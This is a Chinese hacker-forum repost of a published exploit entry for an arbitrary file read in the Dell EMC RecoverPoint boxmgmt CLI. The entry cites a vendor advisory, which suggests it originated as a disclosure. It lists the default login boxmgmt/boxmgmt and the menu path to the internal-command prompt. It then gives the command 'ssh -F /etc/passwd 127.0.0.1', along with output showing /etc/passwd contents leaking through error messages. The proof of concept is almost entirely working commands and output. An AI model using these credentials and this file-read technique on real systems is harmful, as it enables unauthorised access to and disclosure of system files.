Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月4日2年前

# Exploit Title: Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read
# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
# Date: 2018-05-21
# Vendor Advisory: DSA-2018-095
# Vendor KB: https://support.emc.com/kb/521234
# Exploit Author: Paul Taylor
# Github: https://github.com/bao7uo/dell-emc_recoverpoint
# Website: https://www.foregenix.com/blog/foregenix-identify-dell-emc-recoverpoint-zero-day-vulnerabilities
# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
# CVE: N/A
 
# 1. Description
# When logging in as boxmgmt and running an internal command, the ssh command may be used
# to display the contents of files from the file system which are accessible to the boxmgmt user.
 
# 2. Proof of Concept
# Log in as boxmgmt via SSH (default credentials boxmgmt/boxmgmt)
# Select [3] Diagnostics
# Select [5] Run Internal Command
# ssh -F /etc/passwd 127.0.0.1

test-cluster: 5
This is the list of commands you are allowed to use: ALAT NetDiag arp arping date ethtool kps.pl netstat ping ping6 ssh telnet top uptime
Enter internal command: ssh -F /etc/passwd 127.0.0.1
/etc/passwd: line 1: Bad configuration option: root:x:0:0:root:/root:/bin/tcsh
/etc/passwd: line 2: Bad configuration option: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
/etc/passwd: line 3: Bad configuration option: bin:x:2:2:bin:/bin:/usr/sbin/nologin
<SNIP>
/etc/passwd: terminating, 34 bad configuration options
Command "ssh -F /etc/passwd 127.0.0.1" exited with return code 65280

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索